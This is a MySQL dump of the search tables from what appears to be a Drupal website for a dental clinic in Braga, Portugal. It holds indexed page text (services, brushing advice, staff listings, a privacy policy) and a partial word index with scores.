-- Table structure for table `search_dataset`
--

CREATE TABLE `search_dataset` (
  `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Search item ID, e.g. node ID for nodes.',
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The languages.langcode of the item variant.',
  `type` varchar(64) CHARACTER SET ascii NOT NULL COMMENT 'Type of item, e.g. node.',
  `data` longtext NOT NULL COMMENT 'List of space-separated words from the item.',
  `reindex` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Set to force node reindexing.',
  PRIMARY KEY (`sid`,`langcode`,`type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Stores items that will be searched.';

--
-- Dumping data for table `search_dataset`
--

INSERT INTO `search_dataset` VALUES (2,'pt-pt','node_search',' clinica dentaria do castelo clinica dentaria do castelo clinica dentaria do castelo a nossa clinica prima pela excelencia e qualidade dos seus tratamentos onde os objectivos esteticos e a satisfacao do paciente pelo seu novo sorriso sao os nossos motivos de orgulho admin sab 20190511 2312  ',0),(3,'pt-pt','node_search',' clinica dentaria do castelo clinica dentaria do castelo bemvindo a clinica de medicina dentaria do castelo a clinica nasceu em 1999 em braga junto ao centro historico da cidade ao longo dos anos tem disponilizado aos seus pacientes um tratamento personalizado face as necessidades de cada um num ambiente familiar o principal objetivo e desde sempre o de prestar os melhores cuidados no sentido de promover a boa de saude oral dos seus pacientes  o seu sorriso e a nossa satisfacao  admin qui 20190516 1743  ',0),(4,'pt-pt','node_search',' servicos clinicos dentarios servicos clinicos dentarios possuimos um conjunto alargado de tratamentos dentarios nos quais conciliamos um exigente padrao de qualidade com custos acessiveis damos especial importancia ao conforto e total satisfacao dos nossos clientes para alem de medicos dentistas altamente qualificados dispomos dum atendimento personalizado que vai ao encontro das expectativas dos nossos pacientes admin qui 20190516 1803  ',0),(5,'pt-pt','node_search',' conselhos de escovagem conselhos de escovagem lava os dentes 3 vezes por dia depois das refeicoes e ao deitar nao escoves os dentes com muita forca troca de escova de 3 em 3 meses e escolhe uma adequada a tua idade visita o dentista ou higienista pelo menos 2 vezes por ano demora pelo menos 2 minutos a escovar os dentes para ficarem bem lavados  como lavar os dentes primeiro escova a parte de fora dos dentes com a escova inclinada em movimentos rotativos   depois escova as partes de dentro dos dentes com a escova na mesma posicao   por fim escova as partes que mastigam com movimentos para tras e para a frente escova a parte de fora dos dentes com a escova inclinada   agora a parte de dentro os dentes da frente incisivos quer de cima quer de baixo devem escovarse com a escova na vertical   acabas a escovar os molares em movimentos para tras e para a frente nao te esquecas de escovar a lingua      admin qui 20190516 1813  ',0),(6,'pt-pt','node_search',' parcerias e acordos parcerias e acordos a nossa clinica tem estabelecido varios acordos que lhe permitem usufruir de condicoes especiais informese nas nossas instalacoes ou contactenos por telefone ou por email admin qui 20190516 1829  ',0),(7,'pt-pt','node_search',' contactos contactos para uma consulta de rotina um tratamento mais complexo ou para comunicar alguma duvida podera utilizar os nosso contactos directos ou podera enviarnos uma mensagem estamos aqui para o ajudar admin qui 20190516 1830  ',0),(8,'pt-pt','node_search',' noticias noticias em breve ficara a conhecer as ultimas noticias da clinica e da area medicina dentaria admin qui 20190516 1912  ',0),(9,'pt-pt','node_search',' dr carlos barbosa dr carlos barbosa admin sex 20190712 1241 medico dentista  ',0),(10,'pt-pt','node_search',' dra ana teresa ferreira dra ana teresa ferreira admin sex 20190712 1241 medica dentista  ',0),(11,'pt-pt','node_search',' dra sara silva dra sara silva admin sex 20190712 1241 medica dentista  ',0),(12,'pt-pt','node_search',' dr joao alves dr joao alves admin sex 20190712 1241 terapeuta da fala  ',0),(13,'pt-pt','node_search',' termos e condicoes termos e condicoes politica de privacidade para o site da clinica medicina dentaria do castelo todas as suas informacoes pessoais recolhidas serao usadas para o ajudar a tornar a sua visita no nosso site o mais produtiva e agradavel possivel a garantia da confidencialidade dos dados pessoais dos utilizadores do nosso site e importante para a clinica medicina dentaria do castelo todas as informacoes pessoais relativas a membros assinantes clientes ou visitantes que usem o site da clinica medicina dentaria do castelo serao tratadas em concordancia com a lei da protecao de dados pessoais de 26 de outubro de 1998 lei nº 6798 a informacao pessoal recolhida pode incluir o seu nome email numero de telefone e ou telemovel morada data de nascimento e ou outros o uso do site da clinica medicina dentaria do castelo pressupoe a aceitacao deste acordo de privacidade a equipa da clinica medicina dentaria do castelo reservase ao direito de alterar este acordo sem aviso previo deste modo recomendamos que consulte a nossa politica de privacidade com regularidade de forma a estar sempre atualizado os anuncios tal como outros websites coletamos e utilizamos informacao contida nos anuncios a informacao contida nos anuncios inclui o seu endereco ip internet protocol o seu isp internet service provider como o sapo clix ou outro o browser que utilizou ao visitar o nosso website como o internet explorer ou o firefox o tempo da sua visita e que paginas visitou dentro do nosso website os cookies e web beacons utilizamos cookies para armazenar informacao tais como as suas preferencias pessoas quando visita o nosso website isto podera incluir um simples popup ou uma ligacao em varios servicos que providenciamos tais como foruns em adicao tambem utilizamos publicidade de terceiros no nosso website para suportar os custos de manutencao alguns destes publicitarios poderao utilizar tecnologias como os cookies e ou web beacons quando publicitam no nosso website o que fara com que esses publicitarios como o google atraves do google adsense tambem recebam a sua informacao pessoal como o endereco ip o seu isp o seu browser etc esta funcao e geralmente utilizada para geotargeting mostrar publicidade de lisboa apenas aos leitores oriundos de lisboa por ex ou apresentar publicidade direcionada a um tipo de utilizador como mostrar publicidade de restaurante a um utilizador que visita sites de culinaria regularmente por ex voce detem o poder de desligar os seus cookies nas opcoes do seu browser ou efetuando alteracoes nas ferramentas de programas antivirus como o norton internet security no entanto isso podera alterar a forma como interage com o nosso website ou outros websites isso podera afetar ou nao permitir que faca logins em programas sites ou foruns da nossa e de outras redes ligacoes a sites de terceiros o site clinica medicina dentaria do castelo possui ligacoes para outros sites os quais a nosso ver podem conter informacoes ferramentas uteis para os nossos visitantes a nossa politica de privacidade nao e aplicada a sites de terceiros pelo que caso visite outro site a partir do nosso devera ler a politica de privacidade do mesmo nao nos responsabilizamos pela politica de privacidade ou conteudo presente nesses mesmos sites admin ter 20190716 1  ',0),(20,'pt-pt','node_search',' o melhor para o servir o melhor para o servir admin qui 20190718 1813 estamos constantemente a apostar em novas tecnicas para melhorar os nossos tratamentos saiba mais sobre nos ',0),(21,'pt-pt','node_search',' boa escovagem boa escovagem admin qui 20190718 1819 siga os nossos conselhos para boa uma higiene oral veja aqui ',0),(22,'pt-pt','node_search',' implantes dentarios implantes dentarios admin qui 20190718 2318 consiga o melhor sorriso com a nossa equipa de profissionais altamente especializados conheca as nossas solucoes ',0),(24,'pt-pt','node_search',' maria jose barbosa maria jose barbosa adminclident sex 20190816 1454 assistente dentaria  ',0),(25,'pt-pt','node_search',' isabel silva isabel silva adminclident sex 20190816 1455 assistente dentaria  ',0),(26,'pt-pt','node_search',' ortodontia ortodontia adminclident qua 20191016 2304 veja as nossas solucoes ',0),(27,'pt-pt','node_search',' diana patrina diana patrina adminclident qua 20191023 933 assistente dentaria  ',0),(28,'pt-pt','node_search',' dra mariana rego dra mariana rego adminclident qua 20200108 909 medica dentista  ',0),(29,'pt-pt','node_search',' o nosso novo site esta online  o nosso novo site esta online hoje assinalamos mais um marco na historia da clinica de medicina dentaria do castelo apresentamos o nosso novo site com o amadurecimento do nosso trabalho e crescimento da nossa equipa sentimos a necessidade de actualizar tambem a imagem para os nossos pacientes e publico em geral no novo site optamos por apresentar uma imagem mais moderna e conteudos renovados no entanto estes conteudos estarao em constante desenvolvimento quer pela evolucao das tecnicas quer pelas sugestoes dos nossos pacientes que tambem neste ambito esperamos que continuem a ajudarnos a crescer esperemos que gostem e aguardamos as vossas sugestoes adminclident qua 20200108 1024  ',0),(30,'pt-pt','node_search',' o nosso novo site esta online  o nosso novo site esta online adminclident qua 20200108 1451 veja as novidades ',0);

--
-- Table structure for table `search_index`
--

CREATE TABLE `search_index` (
  `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'The search_total.word that is associated with the search item.',
  `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The search_dataset.sid of the searchable item to which the word belongs.',
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The languages.langcode of the item variant.',
  `type` varchar(64) CHARACTER SET ascii NOT NULL COMMENT 'The search_dataset.type of the searchable item to which the word belongs.',
  `score` float DEFAULT NULL COMMENT 'The numeric score of the word, higher being more important.',
  PRIMARY KEY (`word`,`sid`,`langcode`,`type`),
  KEY `sid_type` (`sid`,`langcode`,`type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Stores the search index, associating words, items and…';

--
-- Dumping data for table `search_index`
--

INSERT INTO `search_index` VALUES ('1',13,'pt-pt','node_search',0.668514),('1024',29,'pt-pt','node_search',1),('1241',9,'pt-pt','node_search',1),('1241',10,'pt-pt','node_search',1),('1241',11,'pt-pt','node_search',1),('1241',12,'pt-pt','node_search',1),('1451',30,'pt-pt','node_search',1),('1454',24,'pt-pt','node_search',1),('1455',25,'pt-pt','node_search',1),('1743',3,'pt-pt','node_search',1),('1803',4,'pt-pt','node_search',1),('1813',5,'pt-pt','node_search',1),('1813',20,'pt-pt','node_search',1),('1819',21,'pt-pt','node_search',1),('1829',6,'pt-pt','node_search',1),('1830',7,'pt-pt','node_search',1),('1912',8,'pt-pt','node_search',1),('1998',13,'pt-pt','node_search',1),('1999',3,'pt-pt','node_search',1),('2',5,'pt-pt','node_search',2),('20190511',2,'pt-pt','node_search',1),('20190516',3,'pt-pt','node_search',1),('20190516',4,'pt-pt','node_search',1),('20190516',5,'pt-pt','node_search',1),('20190516',6,'pt-pt','node_search',1),('20190516',7,'pt-pt','node_search',1),('20190516',8,'pt-pt','node_search',1),('20190712',9,'pt-pt','node_search',1),('20190712',10,'pt-pt','node_search',1),('20190712',11,'pt-pt','node_search',1),('20190712',12,'pt-pt','node_search',1),('20190716',13,'pt-pt','node_search',0.670377),('20190718',20,'pt-pt','node_search',1),('20190718',21,'pt-pt','node_search',1),('20190718',22,'pt-pt','node_search',1),('20190816',24,'pt-pt','node_search',1),('20190816',25,'pt-pt','node_search',1),('20191016',26,'pt-pt','node_search',1),('20191023',27,'pt-pt','node_search',1),('20200108',28,'pt-pt','node_search',1),('20200108',29,'pt-pt','node_search',1),('20200108',30,'pt-pt','node_search',1),('2304',26,'pt-pt','node_search',1),('2312',2,'pt-pt','node_search',1),('2318',22,'pt-pt','node_search',1),('26',13,'pt-pt','node_search',1),('3',5,'pt-pt','node_search',3),('6798',13,'pt-pt','node_search',1),('909',28,'pt-pt','node_search',1),('933',27,'pt-pt','node_search',1),('acabas',5,'pt-pt','node_search',19),('aceitacao',13,'pt-pt','node_search',1),('acessiveis',4,'pt-pt','node_search',1),('acordo',13,'pt-pt','node_search',2),('acordos',6,'pt-pt','node_search',28),('actualizar',29,'pt-pt','node_search',1),('adequada',5,'pt-pt','node_search',1),('adicao',13,'pt-pt','node_search',0.892724),('admin',2,'pt-pt','node_search',1),('admin',3,'pt-pt','node_search',1),('admin',4,'pt-pt','node_search',1),('admin',5,'pt-pt','node_search',1),('admin',6,'pt-pt','node_search',1),('admin',7,'pt-pt','node_search',1),('admin',8,'pt-pt','node_search',1),('admin',9,'pt-pt','node_search',1),('admin',10,'pt-pt','node_search',1),('admin',11,'pt-pt','node_search',1),('admin',12,'pt-pt','node_search',1),('admin',13,'pt-pt','node_search',0.674137),('admin',20,'pt-pt','node_search',1),('admin',21,'pt-pt','node_search',1),('admin',22,'pt-pt','node_search',1),('adminclident',24,'pt-pt','node_search',1),('adminclident',25,'pt-pt','node_search',1),('adminclident',26,'pt-pt','node_search',1),('adminclident',27,'pt-pt','node_search',1),('adminclident',28,'pt-pt','node_search',1),('adminclident',29,'pt-pt','node_search',1),('adminclident',30,'pt-pt','node_search',1),('adsense',13,'pt-pt','node_search',0.836446),('afetar',13,'pt-pt','node_search',0.733888),('agora',5,'pt-pt','node_search',19),('agradavel',13,'pt-pt','node_search',1),('aguardamos',29,'pt-pt','node_search',1),('ajudar',7,'pt-pt','node_search',1),('ajudar',13,'pt-pt','node_search',1),('ajudarnos',29,'pt-pt','node_search',1),('alargado',4,'pt-pt','node_search',1),('alem',4,'pt-pt','node_search',1),('alguma',7,'pt-pt','node_search',1),('alguns',13,'pt-pt','node_search',0.869951),('altamente',4,'pt-pt','node_search',1),('altamente',22,'pt-pt','node_search',1),('alteracoes',13,'pt-pt','node_search',0.754681),('alterar',13,'pt-pt','node_search',1.73614),('alves',12,'pt-pt','node_search',27),('amadurecimento',29,'pt-pt','node_search',1),('ambiente',3,'pt-pt','node_search',1),('ambito',29,'pt-pt','node_search',1),('ana',10,'pt-pt','node_search',27),('ano',5,'pt-pt','node_search',1),('anos',3,'pt-pt','node_search',1),('antivirus',13,'pt-pt','node_search',0.747619),('anuncios',13,'pt-pt','node_search',21),('aos',3,'pt-pt','node_search',1),('aos',13,'pt-pt','node_search',0.805455),('apenas',13,'pt-pt','node_search',0.808176),('aplicada',13,'pt-pt','node_search',0.7017),('apostar',20,'pt-pt','node_search',1),('apresentamos',29,'pt-pt','node_search',1),('apresentar',13,'pt-pt','node_search',0.794753),('apresentar',29,'pt-pt','node_search',1),('aqui',7,'pt-pt','node_search',1),('aqui',21,'pt-pt','node_search',11),('area',8,'pt-pt','node_search',1),('armazenar',13,'pt-pt','node_search',0.945829),('assinalamos',29,'pt-pt','node_search',1),('assinantes',13,'pt-pt','node_search',1),('assistente',24,'pt-pt','node_search',1),('assistente',25,'pt-pt','node_search',1),('assistente',27,'pt-pt','node_search',1),('atendimento',4,'pt-pt','node_search',1),('atraves',13,'pt-pt','node_search',0.839384),('atualizado',13,'pt-pt','node_search',1),('aviso',13,'pt-pt','node_search',1),('baixo',5,'pt-pt','node_search',1),('barbosa',9,'pt-pt','node_search',27),('barbosa',24,'pt-pt','node_search',27),('beacons',13,'pt-pt','node_search',18.8937),('bem',5,'pt-pt','node_search',1),('bemvindo',3,'pt-pt','node_search',1),('boa',3,'pt-pt','node_search',1),('boa',21,'pt-pt','node_search',28),('braga',3,'pt-pt','node_search',1),('breve',8,'pt-pt','node_search',1),('browser',13,'pt-pt','node_search',2.585),('cada',3,'pt-pt','node_search',1),('carlos',9,'pt-pt','node_search',27),('caso',13,'pt-pt','node_search',0.697623),('castelo',2,'pt-pt','node_search',46),('castelo',3,'pt-pt','node_search',28),('castelo',13,'pt-pt','node_search',23.7164),('castelo',29,'pt-pt','node_search',1),('centro',3,'pt-pt','node_search',1),('cidade',3,'pt-pt','node_search',1),('cima',5,'pt-pt','node_search',19),('clientes',4,'pt-pt','node_search',1),('clientes',13,'pt-pt','node_search',1),('clinica',2,'pt-pt','node_search',47),('clinica',3,'pt-pt','node_search',29),('clinica',6,'pt-pt','node_search',1),('clinica',8,'pt-pt','node_search',1),('clinica',13,'pt-pt','node_search',23.7164),('clinica',29,'pt-pt','node_search',1),('clinicos',4,'pt-pt','node_search',27),('clix',13,'pt-pt','node_search',1),('coletamos',13,'pt-pt','node_search',1),('com',4,'pt-pt','node_search',1),('com',5,'pt-pt','node_search',78),('com',13,'pt-pt','node_search',3.57921),('com',22,'pt-pt','node_search',1),('com',29,'pt-pt','node_search',1),('como',5,'pt-pt','node_search',19),('como',13,'pt-pt','node_search',9.60542),('complexo',7,'pt-pt','node_search',1),('comunicar',7,'pt-pt','node_search',1),('conciliamos',4,'pt-pt','node_search',1),('concordancia',13,'pt-pt','node_search',1),('condicoes',6,'pt-pt','node_search',1),('condicoes',13,'pt-pt','node_search',27),('confidencialidade',13,'pt-pt','node_search',1),('conforto',4,'pt-pt','node_search',1),('conheca',22,'pt-pt','node_search',11),('conhecer',8,'pt-pt','node_search',1),('conjunto',4,'pt-pt','node_search',1),('conselhos',5,'pt-pt','node_search',27),('conselhos',21,'pt-pt','node_search',1),('consiga',22,'pt-pt','node_search',1),('constante',29,'pt-pt','node_search',1),('constantemente',20,'pt-pt','node_search',1),('consulta',7,'pt-pt','node_search',1),('consulte',13,'pt-pt','node_search',1),('contactenos',6,'pt-pt','node_search',1),('contactos',7,'pt-pt','node_search',28),('conter',13,'pt-pt','node_search',0.707906),('conteudo',13,'pt-pt','node_search',0.681785),('conteudos',29,'pt-pt','node_search',2),('contida',13,'pt-pt','node_search',2),('continuem',29,'pt-pt','node_search',1),('cookies',13,'pt-pt','node_search',20.7463),('crescer',29,'pt-pt','node_search',1),('crescimento',29,'pt-pt','node_search',1),('cuidados',3,'pt-pt','node_search',1),('culinaria',13,'pt-pt','node_search',0.779231),('custos',4,'pt-pt','node_search',1),('custos',13,'pt-pt','node_search',0.876337),('dados',13,'pt-pt','node_search',2),('damos',4,'pt-pt','node_search',1),('das',4,'pt-pt','node_search',1),('das',5,'pt-pt','node_search',1),('das',29,'pt-pt','node_search',1),('data',13,'pt-pt','node_search',1),('deitar',5,'pt-pt','node_search',1),('demora',5,'pt-pt','node_search',1),('dentaria',2,'pt-pt','node_search',46),('dentaria',3,'pt-pt','node_search',28),('dentaria',8,'pt-pt','node_search',1),('dentaria',13,'pt-pt','node_search',23.7164),('dentaria',24,'pt-pt','node_search',1),('dentaria',25,'pt-pt','node_search',1),('dentaria',27,'pt-pt','node_search',1),('dentaria',29,'pt-pt','node_search',1),('dentarios',4,'pt-pt','node_search',28),('dentarios',22,'pt-pt','node_search',27),('dentes',5,'pt-pt','node_search',98),('dentista',5,'pt-pt','node_search',1),('dentista',9,'pt-pt','node_search',1),('dentista',10,'pt-pt','node_search',1),('dentista',11,'pt-pt','node_search',1),('dentista',28,'pt-pt','node_search',1),('dentistas',4,'pt-pt','node_search',1),('dentro',5,'pt-pt','node_search',38),('dentro',13,'pt-pt','node_search',0.961087),('depois',5,'pt-pt','node_search',20),('desde',3,'pt-pt','node_search',1),('desenvolvimento',29,'pt-pt','node_search',1),('desligar',13,'pt-pt','node_search',0.766757),('deste',13,'pt-pt','node_search',2),('destes',13,'pt-pt','node_search',0.866793),('detem',13,'pt-pt','node_search',0.771698),('devem',5,'pt-pt','node_search',1),('devera',13,'pt-pt','node_search',0.691597),('dia',5,'pt-pt','node_search',1),('diana',27,'pt-pt','node_search',27),('direcionada',13,'pt-pt','node_search',0.792123),('directos',7,'pt-pt','node_search',1),('direito',13,'pt-pt','node_search',1),('dispomos',4,'pt-pt','node_search',1),('disponilizado',3,'pt-pt','node_search',1),('dos',2,'pt-pt','node_search',1),('dos',3,'pt-pt','node_search',2),('dos',4,'pt-pt','node_search',2),('dos',5,'pt-pt','node_search',57),('dos',13,'pt-pt','node_search',2),('dos',29,'pt-pt','node_search',1),('dra',10,'pt-pt','node_search',27),('dra',11,'pt-pt','node_search',27),('dra',28,'pt-pt','node_search',27),('dum',4,'pt-pt','node_search',1),('duvida',7,'pt-pt','node_search',1),('efetuando',13,'pt-pt','node_search',0.757065),('email',6,'pt-pt','node_search',1),('email',13,'pt-pt','node_search',1),('encontro',4,'pt-pt','node_search',1),('endereco',13,'pt-pt','node_search',1.83063),('entanto',13,'pt-pt','node_search',0.740689),('entanto',29,'pt-pt','node_search',1),('enviarnos',7,'pt-pt','node_search',1),('equipa',13,'pt-pt','node_search',1),('equipa',22,'pt-pt','node_search',1),('equipa',29,'pt-pt','node_search',1),('escolhe',5,'pt-pt','node_search',1),('escova',5,'pt-pt','node_search',135),('escovagem',5,'pt-pt','node_search',27),('escovagem',21,'pt-pt','node_search',27),('escovar',5,'pt-pt','node_search',21),('escovarse',5,'pt-pt','node_search',1),('escoves',5,'pt-pt','node_search',1),('especiais',6,'pt-pt','node_search',1),('especial',4,'pt-pt','node_search',1),('especializados',22,'pt-pt','node_search',1),('esperamos',29,'pt-pt','node_search',1),('esperemos',29,'pt-pt','node_search',1),('esquecas',5,'pt-pt','node_search',1),('esses',13,'pt-pt','node_search',0.845322),('esta',13,'pt-pt','node_search',0.827757),('esta',29,'pt-pt','node_search',27),('esta',30,'pt-pt','node_search',27),('estabelecido',6,'pt-pt','node_search',1),('estamos',7,'pt-pt','node_search',1),('estamos',20,'pt-pt','node_search',1),('estar',13,'pt-pt','node_search',1),('estarao',29,'pt-pt','node_search',1),('este',13,'pt-pt','node_search',1),('estes',29,'pt-pt','node_search',1),('esteticos',2,'pt-pt','node_search',1),('etc',13,'pt-pt','node_search',0.830633),('evolucao',29,'pt-pt','node_search',1),('excelencia',2,'pt-pt','node_search',1),('exigente',4,'pt-pt','node_search',1),('expectativas',4,'pt-pt','node_search',1),('explorer',13,'pt-pt','node_search',0.980874),('faca',13,'pt-pt','node_search',0.727213),('face',3,'pt-pt','node_search',1),('fala',12,'pt-pt','node_search',1),('familiar',3,'pt-pt','node_search',1),('fara',13,'pt-pt','node_search',0.848323),('ferramentas',13,'pt-pt','node_search',1.45814),('ferreira',10,'pt-pt','node_search',27),('ficara',8,'pt-pt','node_search',1),('ficarem',5,'pt-pt','node_search',1),('fim',5,'pt-pt','node_search',19),('firefox',13,'pt-pt','node_search',0.976851),('fora',5,'pt-pt','node_search',38),('forca',5,'pt-pt','node_search',1),('forma',13,'pt-pt','node_search',1.73614),('foruns',13,'pt-pt','node_search',1.61891),('frente',5,'pt-pt','node_search',57),('funcao',13,'pt-pt','node_search',0.824901),('garantia',13,'pt-pt','node_search',1),('geotargeting',13,'pt-pt','node_search',0.816452),('geral',29,'pt-pt','node_search',1),('geralmente',13,'pt-pt','node_search',0.822065),('google',13,'pt-pt','node_search',1.67879),('gostem',29,'pt-pt','node_search',1),('higiene',21,'pt-pt','node_search',1),('higienista',5,'pt-pt','node_search',1),('historia',29,'pt-pt','node_search',1),('historico',3,'pt-pt','node_search',1),('hoje',29,'pt-pt','node_search',1),('idade',5,'pt-pt','node_search',1),('imagem',29,'pt-pt','node_search',2),('implantes',22,'pt-pt','node_search',27),('importancia',4,'pt-pt','node_search',1),('importante',13,'pt-pt','node_search',1),('incisivos',5,'pt-pt','node_search',19),('inclinada',5,'pt-pt','node_search',38),('inclui',13,'pt-pt','node_search',1),('incluir',13,'pt-pt','node_search',1.92027),('informacao',13,'pt-pt','node_search',4.77272),('informacoes',13,'pt-pt','node_search',2.70583),('informese',6,'pt-pt','node_search',1),('instalacoes',6,'pt-pt','node_search',1),('interage',13,'pt-pt','node_search',0.736141),('internet',13,'pt-pt','node_search',3.72386),('isabel',25,'pt-pt','node_search',27),('isp',13,'pt-pt','node_search',1.83063),('isso',13,'pt-pt','node_search',1.4723),('isto',13,'pt-pt','node_search',0.927431),('joao',12,'pt-pt','node_search',27),('jose',24,'pt-pt','node_search',27),('junto',3,'pt-pt','node_search',1),('lava',5,'pt-pt','node_search',1),('lavados',5,'pt-pt','node_search',1),('lavar',5,'pt-pt','node_search',19),('lei',13,'pt-pt','node_search',2),('leitores',13,'pt-pt','node_search',0.802752),('ler',13,'pt-pt','node_search',0.689612),('lhe',6,'pt-pt','node_search',1),('ligacao',13,'pt-pt','node_search',0.909743),('ligacoes',13,'pt-pt','node_search',14.3658),('lingua',5,'pt-pt','node_search',1),('lisboa',13,'pt-pt','node_search',1.60832),('logins',13,'pt-pt','node_search',0.725015),('longo',3,'pt-pt','node_search',1),('mais',7,'pt-pt','node_search',1),('mais',13,'pt-pt','node_search',1),('mais',20,'pt-pt','node_search',11),('mais',29,'pt-pt','node_search',2),('manutencao',13,'pt-pt','node_search',0.873132),('marco',29,'pt-pt','node_search',1),('maria',24,'pt-pt','node_search',27),('mariana',28,'pt-pt','node_search',27),('mastigam',5,'pt-pt','node_search',19),('medica',10,'pt-pt','node_search',1),('medica',11,'pt-pt','node_search',1),('medica',28,'pt-pt','node_search',1),('medicina',3,'pt-pt','node_search',1),('medicina',8,'pt-pt','node_search',1),('medicina',13,'pt-pt','node_search',23.7164),('medicina',29,'pt-pt','node_search',1),('medico',9,'pt-pt','node_search',1),('medicos',4,'pt-pt','node_search',1),('melhor',20,'pt-pt','node_search',27),('melhor',22,'pt-pt','node_search',1),('melhorar',20,'pt-pt','node_search',1),('melhores',3,'pt-pt','node_search',1),('membros',13,'pt-pt','node_search',1),('menos',5,'pt-pt','node_search',2),('mensagem',7,'pt-pt','node_search',1),('meses',5,'pt-pt','node_search',1),('mesma',5,'pt-pt','node_search',19),('mesmo',13,'pt-pt','node_search',0.687638),('mesmos',13,'pt-pt','node_search',0.676032),('minutos',5,'pt-pt','node_search',1),('moderna',29,'pt-pt','node_search',1),('modo',13,'pt-pt','node_search',1),('molares',5,'pt-pt','node_search',19),('morada',13,'pt-pt','node_search',1),('mostrar',13,'pt-pt','node_search',1.59801),('motivos',2,'pt-pt','node_search',1),('movimentos',5,'pt-pt','node_search',57),('muita',5,'pt-pt','node_search',1),('nao',5,'pt-pt','node_search',20),('nao',13,'pt-pt','node_search',2.11902),('nas',6,'pt-pt','node_search',1),('nas',13,'pt-pt','node_search',1.51419),('nasceu',3,'pt-pt','node_search',1),('nascimento',13,'pt-pt','node_search',1),('necessidade',29,'pt-pt','node_search',1),('necessidades',3,'pt-pt','node_search',1),('nesses',13,'pt-pt','node_search',0.677939),('neste',29,'pt-pt','node_search',1),('nome',13,'pt-pt','node_search',1),('norton',13,'pt-pt','node_search',0.745294),('nos',4,'pt-pt','node_search',1),('nos',13,'pt-pt','node_search',2.68568),('nos',20,'pt-pt','node_search',11),('nossa',2,'pt-pt','node_search',1),('nossa',3,'pt-pt','node_search',4),('nossa',6,'pt-pt','node_search',1),('nossa',13,'pt-pt','node_search',2.42453),('nossa',22,'pt-pt','node_search',1),('nossa',29,'pt-pt','node_search',1),('nossas',6,'pt-pt','node_search',1),('nossas',22,'pt-pt','node_search',11),('nossas',26,'pt-pt','node_search',11),('nosso',7,'pt-pt','node_search',1),('nosso',13,'pt-pt','node_search',8.73507),('nosso',29,'pt-pt','node_search',29),('nosso',30,'pt-pt','node_search',27),('nossos',2,'pt-pt','node_search',1),('nossos',4,'pt-pt','node_search',2),('nossos',13,'pt-pt','node_search',0.703756),('nossos',20,'pt-pt','node_search',1),('nossos',21,'pt-pt','node_search',1),('nossos',29,'pt-pt','node_search',2),('noticias',8,'pt-pt','node_search',28),('novas',20,'pt-pt','node_search',1),('novidades',30,'pt-pt','node_search',11),('novo',2,'pt-pt','node_search',1),('novo',29,'pt-pt','node_search',29),('novo',30,'pt-pt','node_search',27),('num',3,'pt-pt','node_search',1),('numero',13,'pt-pt','node_search',1),('objectivos',2,'pt-pt','node_search',1),('objetivo',3,'pt-pt','node_search',1),('onde',2,'pt-pt','node_search',1),('online',29,'pt-pt','node_search',27),('online',30,'pt-pt','node_search',27),('opcoes',13,'pt-pt','node_search',0.759465),('optamos',29,'pt-pt','node_search',1),('oral',3,'pt-pt','node_search',1),('oral',21,'pt-pt','node_search',1),('orgulho',2,'pt-pt','node_search',1),('oriundos',13,'pt-pt','node_search',0.800068),('ortodontia',26,'pt-pt','node_search',27),('outras',13,'pt-pt','node_search',0.722831),('outro',13,'pt-pt','node_search',1.69359),('outros',13,'pt-pt','node_search',3.44811),('outubro',13,'pt-pt','node_search',1),('paciente',2,'pt-pt','node_search',1),('pacientes',3,'pt-pt','node_search',2),('pacientes',4,'pt-pt','node_search',1),('pacientes',29,'pt-pt','node_search',2),('padrao',4,'pt-pt','node_search',1),('paginas',13,'pt-pt','node_search',0.968904),('para',4,'pt-pt','node_search',1),('para',5,'pt-pt','node_search',77),('para',7,'pt-pt','node_search',3),('para',13,'pt-pt','node_search',25.0598),('para',20,'pt-pt','node_search',28),('para',21,'pt-pt','node_search',1),('para',29,'pt-pt','node_search',1),('parcerias',6,'pt-pt','node_search',27),('parte',5,'pt-pt','node_search',57),('partes',5,'pt-pt','node_search',38),('partir',13,'pt-pt','node_search',0.693594),('patrina',27,'pt-pt','node_search',27),('pela',2,'pt-pt','node_search',1),('pela',13,'pt-pt','node_search',0.683725),('pela',29,'pt-pt','node_search',1),('pelas',29,'pt-pt','node_search',1),('pelo',2,'pt-pt','node_search',1),('pelo',5,'pt-pt','node_search',2),('pelo',13,'pt-pt','node_search',0.699655),('permitem',6,'pt-pt','node_search',1),('permitir',13,'pt-pt','node_search',0.729424),('personalizado',3,'pt-pt','node_search',1),('personalizado',4,'pt-pt','node_search',1),('pessoais',13,'pt-pt','node_search',4),('pessoal',13,'pt-pt','node_search',1.83063),('pessoas',13,'pt-pt','node_search',0.934703),('pode',13,'pt-pt','node_search',1),('podem',13,'pt-pt','node_search',0.71),('poder',13,'pt-pt','node_search',0.769219),('podera',7,'pt-pt','node_search',2),('podera',13,'pt-pt','node_search',2.39387),('poderao',13,'pt-pt','node_search',0.860547),('politica',13,'pt-pt','node_search',22.0711),('popup',13,'pt-pt','node_search',0.916736),('por',5,'pt-pt','node_search',21),('por',6,'pt-pt','node_search',2),('por',13,'pt-pt','node_search',1.57159),('por',29,'pt-pt','node_search',1),('posicao',5,'pt-pt','node_search',19),('possivel',13,'pt-pt','node_search',1),('possui',13,'pt-pt','node_search',0.716357),('possuimos',4,'pt-pt','node_search',1),('preferencias',13,'pt-pt','node_search',0.938382),('presente',13,'pt-pt','node_search',0.679856),('pressupoe',13,'pt-pt','node_search',1),('prestar',3,'pt-pt','node_search',1),('previo',13,'pt-pt','node_search',1),('prima',2,'pt-pt','node_search',1),('primeiro',5,'pt-pt','node_search',19),('principal',3,'pt-pt','node_search',1),('privacidade',13,'pt-pt','node_search',23.0711),('produtiva',13,'pt-pt','node_search',1),('profissionais',22,'pt-pt','node_search',1),('programas',13,'pt-pt','node_search',1.47279),('promover',3,'pt-pt','node_search',1),('protecao',13,'pt-pt','node_search',1),('protocol',13,'pt-pt','node_search',1),('providenciamos',13,'pt-pt','node_search',0.899454),('provider',13,'pt-pt','node_search',1),('publicidade',13,'pt-pt','node_search',3.27347),('publicitam',13,'pt-pt','node_search',0.851346),('publicitarios',13,'pt-pt','node_search',1.706),('publico',29,'pt